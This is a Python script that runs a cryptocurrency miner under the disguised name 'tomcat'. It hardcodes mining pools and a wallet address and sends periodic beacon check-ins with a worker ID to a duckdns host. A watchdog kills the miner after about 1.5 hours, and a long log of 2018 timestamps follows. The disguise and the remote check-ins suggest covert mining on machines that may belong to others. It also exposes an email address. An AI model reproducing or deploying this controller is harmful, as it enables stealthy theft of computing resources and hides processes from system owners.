import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:05.719167
#2018-02-17 17:35:05.638583
#2018-02-17 19:23:05.531601
#2018-02-17 21:14:07.217137
#2018-02-17 22:58:06.825222
#2018-02-18 00:44:07.890398
#2018-02-18 02:34:02.077593
#2018-02-18 04:20:06.664012
#2018-02-18 06:11:07.069480
#2018-02-18 08:00:08.081371
#2018-02-18 09:48:04.749333
#2018-02-18 11:35:05.802704
#2018-02-18 13:21:07.337791
#2018-02-18 15:11:01.644044
#2018-02-18 16:58:07.558104
#2018-02-18 18:47:04.826097
#2018-02-18 20:34:03.624026
#2018-02-18 22:20:03.211090
#2018-02-19 00:09:07.270214
#2018-02-19 01:55:01.526133
#2018-02-19 03:42:03.003505
#2018-02-19 05:27:02.076481
#2018-02-19 07:14:02.159243
#2018-02-19 09:02:02.142654
#2018-02-19 10:49:07.936206
#2018-02-19 12:36:09.049225
#2018-02-19 14:25:09.851479
#2018-02-19 16:15:07.828466
#2018-02-19 18:01:07.175868
#2018-02-19 19:47:08.038601
#2018-02-19 21:36:05.879955
#2018-02-19 23:22:05.906782
#2018-02-20 01:08:03.646635
#2018-02-20 02:56:06.672569
#2018-02-20 04:44:05.747270
#2018-02-20 06:28:06.003456
#2018-02-20 08:13:05.255968
#2018-02-20 09:58:03.789170
#2018-02-20 11:42:06.562482
#2018-02-20 13:29:09.268647
#2018-02-20 15:13:08.040157
#2018-02-20 16:57:04.051608
#2018-02-20 18:45:07.947184
#2018-02-20 20:38:05.671018
#2018-02-20 22:24:08.146400
#2018-02-21 00:06:08.399109
#2018-02-21 01:53:06.615830
#2018-02-21 03:42:05.453713
#2018-02-21 05:30:07.339978
#2018-02-21 07:18:01.865194
#2018-02-21 09:02:08.848734
#2018-02-21 10:50:08.111835
#2018-02-21 12:36:06.010728
#2018-02-21 14:23:05.429034
#2018-02-21 16:11:01.776676
#2018-02-21 18:01:06.750650
#2018-02-21 19:48:05.505887
#2018-02-21 21:36:08.775723
#2018-02-21 23:24:01.792854
#2018-02-22 01:14:03.983255
#2018-02-22 03:03:01.327002
#2018-02-22 04:48:06.394297
#2018-02-22 06:33:05.894396
#2018-02-22 08:22:06.918689
#2018-02-22 10:09:06.098961
#2018-02-22 11:56:04.162479
#2018-02-22 13:43:06.160827
#2018-02-22 15:30:11.779579
#2018-02-22 17:16:06.438996
#2018-02-22 19:02:07.747454
#2018-02-22 20:52:08.315337
#2018-02-22 22:37:05.320594
#2018-02-23 00:26:05.644327
#2018-02-23 02:13:01.872464
#2018-02-23 04:03:07.357386
#2018-02-23 05:49:07.299949
#2018-02-23 07:38:04.386789
#2018-02-23 09:41:01.174160
#2018-02-23 11:47:08.642776
#2018-02-23 13:37:07.165632
#2018-02-23 15:26:04.432133
#2018-02-23 17:16:01.845148
#2018-02-23 18:59:05.763753
#2018-02-23 20:45:06.733160
#2018-02-23 22:39:05.698984
#2018-02-24 00:26:04.323243
#2018-02-24 02:16:06.819036
#2018-02-24 04:07:04.314538
#2018-02-24 05:54:06.726862
#2018-02-24 07:42:07.137232
#2018-02-24 09:27:01.797846
#2018-02-24 11:20:04.906211
#2018-02-24 13:09:08.552890
#2018-02-24 14:59:05.239666
#2018-02-24 16:49:01.319825
#2018-02-24 18:37:03.897400
#2018-02-24 20:28:04.924746
#2018-02-24 22:24:05.397209
#2018-02-25 01:31:07.320922
#2018-02-25 04:28:04.920805
#2018-02-25 08:03:05.442993